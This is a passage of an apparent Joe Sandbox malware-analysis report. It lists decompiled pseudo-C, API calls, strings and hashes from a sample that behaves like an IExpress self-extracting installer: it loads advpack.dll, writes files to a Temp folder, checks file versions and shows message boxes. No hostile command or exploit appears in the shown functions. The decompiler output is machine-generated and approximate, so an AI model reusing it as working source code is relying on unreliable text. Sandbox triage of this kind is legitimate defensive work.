							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x8a9a40 = _t119;
						 *0x8a8184 = 1;
						 *0x8a8180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x8a9a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x8a8184 = _t135;
							 *0x8a8180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E008A44B9(0, _t138);
					L66:
					return E008A6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x008a36f9
0x008a3700
0x008a370c
0x008a3716
0x008a3718
0x008a371b
0x008a3721
0x008a372b
0x008a373d
0x008a3745
0x008a3746
0x008a3746
0x008a3749
0x008a37ab
0x008a37ad
0x008a37ae
0x008a37b3
0x008a37b8
0x008a37b8
0x008a37bf
0x008a37bf
0x008a37c5
0x00000000
0x00000000
0x008a37cb
0x008a37cd
0x00000000
0x00000000
0x008a37d5
0x008a37db
0x008a37e8
0x008a37ea
0x008a37ea
0x008a37ea
0x008a37f0
0x008a37f6
0x008a3805
0x008a3817
0x008a382b
0x008a3830
0x008a3836
0x008a383b
0x008a383d
0x008a38eb
0x008a38eb
0x008a38f2
0x008a390c
0x008a3911
0x008a3911
0x008a3913
0x008a394d
0x008a394d
0x008a394f
0x008a38a9
0x008a38a9
0x008a38b0
0x008a38b2
0x008a38b9
0x008a38bb
0x008a38c1
0x008a3975
0x008a38c7
0x008a38de
0x008a38e0
0x008a38e0
0x008a397b
0x008a397d
0x008a39a9
0x008a397f
0x008a3982
0x008a398b
0x008a398d
0x008a398f
0x008a399f
0x008a39a1
0x008a3991
0x008a3991
0x008a3991
0x008a398f
0x008a39af
0x008a39b6
0x008a3a0f
0x008a3a0f
0x008a3a11
0x008a3a13
0x008a3a19
0x00000000
0x008a39b8
0x008a39b8
0x008a39ba
0x00000000
0x00000000
0x008a39bc
0x008a39bf
0x00000000
0x00000000
0x008a39c3
0x008a39c9
0x008a39ce
0x008a39d0
0x008a39e3
0x008a39e5
0x008a39e6
0x008a39f1
0x008a39f7
0x008a39fa
0x008a3a01
0x008a3a04
0x00000000
0x00000000
0x008a3a06
0x008a3a09
0x008a3a09
0x008a3a0b
0x008a3a0b
0x00000000
0x008a3a09
0x008a39fc
0x00000000
0x008a39fc
0x008a39d3
0x008a39d8
0x008a39da
0x00000000
0x00000000
0x00000000
0x008a39dc
0x008a39b6
0x008a3955
0x008a395b
0x00000000
0x00000000
0x008a3961
0x008a3963
0x00000000
0x00000000
0x008a3969
0x008a3969
0x00000000
0x008a3969
0x008a3915
0x008a3915
0x008a391b
0x008a391f
0x00000000
0x00000000
0x008a392d
0x008a3933
0x008a3938
0x008a393a
0x00000000
0x00000000
0x008a3940
0x008a3946
0x008a394b
0x00000000
0x008a394b
0x00000000
0x008a38f2
0x008a3843
0x008a3845
0x00000000
0x00000000
0x008a384b
0x008a384d
0x008a3883
0x008a3885
0x00000000
0x00000000
0x008a389a
0x008a389e
0x008a389e
0x00000000
0x00000000
0x008a38a0
0x008a38a0
0x008a38a2
0x00000000
0x00000000
0x008a38a4
0x00000000
0x008a38a4
0x008a384f
0x008a3851
0x008a3857
0x008a386e
0x008a3877
0x008a387b
0x00000000
0x00000000
0x00000000
0x008a3881
0x008a3859
0x008a385c
0x008a3862
0x008a3866
0x00000000
0x00000000
0x008a3868
0x00000000
0x008a38f4
0x008a38f4
0x008a38f5
0x008a38fb
0x008a3901
0x008a3901
0x00000000
0x008a390a
0x008a374b
0x008a374e
0x008a375c
0x008a3764
0x008a3769
0x008a376e
0x008a3771
0x008a379c
0x008a379f
0x00000000
0x00000000
0x008a37a3
0x008a37a4
0x00000000
0x008a37a4
0x008a3773
0x008a3777
0x008a3778
0x008a377f
0x008a3781
0x008a378e
0x008a378e
0x008a3794
0x00000000
0x008a3794
0x008a3783
0x00000000
0x00000000
0x008a3785
0x008a378c
0x00000000
0x00000000
0x00000000
0x008a378c
0x008a3750
0x00000000
0x008a372d
0x008a372d
0x008a396b
0x008a396b
0x008a396c
0x008a396e
0x008a396f
0x008a3a1e
0x008a3a1e
0x008a3a22
0x008a3a27
0x008a3a3e
0x008a3a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 008A3723
MessageBeep.USER32(00000000), ref: 008A39C3
MessageBoxA.USER32(00000000,00000000,siga30,00000030), ref: 008A39F1

Strings

siga30, xrefs: 008A39E9, 008A3A19
3, xrefs: 008A3785

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$siga30
API String ID: 2519184315-1901119258
Opcode ID: 8b8c2e28ec0b1af4aafa082a02896dcc37a3e44c35c14f144e8e7d2b534ff96f
Instruction ID: ccce82619886ef31cacd4cca208bbc771254c777033f222cf54d659de0e4544d
Opcode Fuzzy Hash: 8b8c2e28ec0b1af4aafa082a02896dcc37a3e44c35c14f144e8e7d2b534ff96f
Instruction Fuzzy Hash: 9E91C4B1E012289BFB758E14CD81BAA77A0FB47304F1940A9F889E7A51D7749F81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 008A6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E008A6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E008A1781( &_v268, 0x104, __ecx, "C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
				_t26 = "advpack.dll";
				E008A658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E008A6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x008a6495
0x008a6495
0x008a64a0
0x008a64a7
0x008a64ab
0x008a64bd
0x008a64c2
0x008a64d3
0x008a64df
0x008a64e8
0x008a6502
0x008a64ee
0x008a64f9
0x008a64f9
0x008a6516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 008A64DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 008A64F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 008A6502

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008A64AC
advpack.dll, xrefs: 008A64C2, 008A64CD, 008A6501

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
API String ID: 438848745-1955609190
Opcode ID: d59c7feebec359b34e3d8468a6dc7cdf13a1079a777446bf62140a6c95daadb8
Instruction ID: 9e9d10161fd44787913fd0c881f738c48f40d7d0022bb0e3408448abbef2714a
Opcode Fuzzy Hash: d59c7feebec359b34e3d8468a6dc7cdf13a1079a777446bf62140a6c95daadb8
Instruction Fuzzy Hash: FE01AD30A04108AFFB549B68DC49AEA7378FB62310F500195F595D29C4EF749E9ACA52

Uniqueness

Uniqueness Score: -1.00%

Function 008A28E8 Relevance: 7.6, APIs: 5, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E008A2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E008A2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E008A2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x008a28f1
0x008a28f4
0x008a28f7
0x008a28f9
0x008a28fc
0x008a28ff
0x008a2901
0x008a2907
0x008a2a62
0x008a2a64
0x008a290d
0x008a290d
0x008a290f
0x008a2912
0x008a2920
0x008a2937
0x00000000
0x00000000
0x008a2944
0x008a294a
0x008a294f
0x008a2a2f
0x008a2a32
0x008a2a34
0x008a2a37
0x008a2a41
0x00000000
0x00000000
0x008a2955
0x008a295e
0x008a2962
0x008a2969
0x008a296f
0x008a2974
0x008a298c
0x008a2a20
0x008a2a21
0x008a2a27
0x008a2a4c
0x008a2a4f
0x008a2a50
0x008a2a53
0x008a2a56
0x008a2a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x008a29b2
0x008a29b2
0x008a29b5
0x008a29bd
0x008a29c3
0x008a29cc
0x008a29d5
0x008a29d7
0x008a29da
0x008a29dd
0x008a29df
0x008a29ec
0x008a29f8
0x008a29fc
0x008a29ff
0x008a2a02
0x008a2a07
0x008a2a0a
0x008a2a0f
0x008a2a19
0x008a2a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008a2a0f
0x008a298c
0x008a2974
0x008a2962
0x00000000
0x008a294f
0x008a2912
0x008a2a65
0x008a2a68
0x008a2a6c
0x008a2a6f
0x008a2a6f
0x008a2a7d

APIs

GlobalFree.KERNEL32 ref: 008A2A6F

Part of subcall function 008A2773: CharUpperA.USER32(8481BC1D,00000000,00000000,00000000), ref: 008A27A8
Part of subcall function 008A2773: CharNextA.USER32(0000054D), ref: 008A27B5
Part of subcall function 008A2773: CharNextA.USER32(00000000), ref: 008A27BC
Part of subcall function 008A2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008A2829
Part of subcall function 008A2773: RegQueryValueExA.ADVAPI32(?,008A1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008A2852
Part of subcall function 008A2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008A2870
Part of subcall function 008A2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008A28A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,008A3938,?,?,?,?,-00000005), ref: 008A2958
GlobalLock.KERNEL32 ref: 008A2969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,008A3938,?,?,?,?,-00000005,?), ref: 008A2A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 008A2A81

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID:
API String ID: 3949799724-0
Opcode ID: df6a1812d9460279d8edee22c110ec19e70eb6b951823e1a00f907e33880fe02
Instruction ID: 70e52ebeec6519dada9f069c52a1a748ec131ba022b1955419d315a56ac11962
Opcode Fuzzy Hash: df6a1812d9460279d8edee22c110ec19e70eb6b951823e1a00f907e33880fe02
Instruction Fuzzy Hash: 52513D31E00229DFEB35CF98D884AAEFBB5FF49700F14412AE915E3A11D731A941DB91

Uniqueness

Uniqueness Score: -1.00%

Function 008A4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E008A4169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E008A468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E008A468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E008A44B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E008A44B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x008a417d
0x008a418f
0x008a4193
0x008a41b7
0x008a41d3
0x008a41e6
0x00000000
0x008a41e7
0x008a41d5
0x008a41d6
0x008a41d8
0x008a41d9
0x008a41da
0x008a41df
0x008a41e1
0x00000000
0x008a41e1
0x008a41b9
0x008a41ba
0x008a41bc
0x008a41bd
0x008a41be
0x00000000
0x008a41be
0x00000000

APIs

Part of subcall function 008A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46A0
Part of subcall function 008A468F: SizeofResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46A9
Part of subcall function 008A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46C3
Part of subcall function 008A468F: LoadResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46CC
Part of subcall function 008A468F: LockResource.KERNEL32(00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46D3
Part of subcall function 008A468F: memcpy_s.MSVCRT ref: 008A46E5
Part of subcall function 008A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,008A30B4), ref: 008A4189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,008A30B4), ref: 008A41E7

Part of subcall function 008A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008A4518
Part of subcall function 008A44B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 008A4554

Strings

<None>, xrefs: 008A41C5
FINISHMSG, xrefs: 008A4173, 008A41AB

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: 7a976adea7955918259164f8d53c4023406293f6af5f96decd4f524d1f8fdb82
Instruction ID: 19f7b5354b71a55b6d9cb4f44e66fccfc60c903ccdd0f3ae8823af3f49775875
Opcode Fuzzy Hash: 7a976adea7955918259164f8d53c4023406293f6af5f96decd4f524d1f8fdb82
Instruction Fuzzy Hash: 590186B53012247BFF2416694C86F7B658DFBD7B95F105025B705D1E809AEDCC05817A

Uniqueness

Uniqueness Score: -1.00%

Function 008A19E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E008A19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E008A43D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x8a9a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E008A6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x008a19e0
0x008a19e0
0x008a19eb
0x008a19f2
0x008a19f9
0x008a19fc
0x008a1a01
0x008a1a2a
0x008a1a2e
0x008a1a3e
0x008a1a4f
0x008a1a62
0x008a1a6a
0x00000000
0x008a1a03
0x008a1a06
0x008a1a20
0x008a1a20
0x008a1a08
0x008a1a08
0x008a1a14
0x00000000
0x008a1a16
0x008a1a18
0x008a1a70
0x008a1a72
0x008a1a72
0x008a1a14
0x008a1a06
0x008a1a81

APIs

EndDialog.USER32(?,?), ref: 008A1A18
GetDesktopWindow.USER32 ref: 008A1A24
LoadStringA.USER32(?,?,00000200), ref: 008A1A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 008A1A62
MessageBeep.USER32(000000FF), ref: 008A1A6A

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: c5dd4ea91d54253867b779f73f5ee2618ad793591afcf30a3293972bc7d33132
Instruction ID: 8c8d3b48b466661ef7f1bfe8ed56bf0182e18c0e46e4c60c02d312627329a3da
Opcode Fuzzy Hash: c5dd4ea91d54253867b779f73f5ee2618ad793591afcf30a3293972bc7d33132
Instruction Fuzzy Hash: 72118E31601119ABEB14EF68DD08AAE77B8FB4A310F108155E916D2990EB30AE01DB96

Uniqueness

Uniqueness Score: -1.00%

Function 008A63C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E008A63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E008A1781( &_v268, 0x104, __ecx, "C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
				E008A658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x8a9124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x8a9124 = 0x80070052;
					_t37 = 0;
				}
				return E008A6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x008a63cb
0x008a63d2
0x008a63d8
0x008a63ea
0x008a63f3
0x008a6401
0x008a6402
0x008a6410
0x008a6415
0x008a6433
0x008a6438
0x008a6449
0x008a6463
0x008a646d
0x008a6477
0x008a6477
0x008a647a
0x008a643a
0x008a643a
0x008a6444
0x008a6444
0x008a6492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008A642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008A645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008A647A

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008A63EB

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 1065093856-388467436
Opcode ID: 4f067ee5b6af5e3bfa5403fb82efacdb9fc371653993a66ac479478da0fa19ee
Instruction ID: 5d17042e833ecf7983548e13200a7673b598232f043d2e380514092844366872
Opcode Fuzzy Hash: 4f067ee5b6af5e3bfa5403fb82efacdb9fc371653993a66ac479478da0fa19ee
Instruction Fuzzy Hash: A921C371A00218AFEB10DF29DC85FEB7768FB4A314F004169E595E3680EBB45D948FA4

Uniqueness

Uniqueness Score: -1.00%

Function 008A47E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A47E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E008A1680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x8a91e0; // 0x2ff8088
						 *(_t34 + 4) = _t11;
						 *0x8a91e0 = _t34;
						return 1;
					}
					_t25 =  *0x8a8584; // 0x0
					E008A44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x8a8584; // 0x0
				E008A44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x008a47e8
0x008a47f0
0x008a47f4
0x008a480f
0x008a4811
0x008a4814
0x008a4814
0x008a4816
0x008a4817
0x008a4829
0x008a482b
0x008a482f
0x008a484f
0x008a4852
0x008a4855
0x008a4855
0x008a4857
0x008a4858
0x008a4860
0x008a4865
0x008a486a
0x008a486f
0x00000000
0x008a4876
0x008a4831
0x008a4841
0x008a4847
0x008a480b
0x00000000
0x008a480b
0x008a47f6
0x008a4806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,008A4E6F), ref: 008A47EA
LocalAlloc.KERNEL32(00000040,?), ref: 008A4823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 008A4847

Part of subcall function 008A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008A4518
Part of subcall function 008A44B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 008A4554

Strings

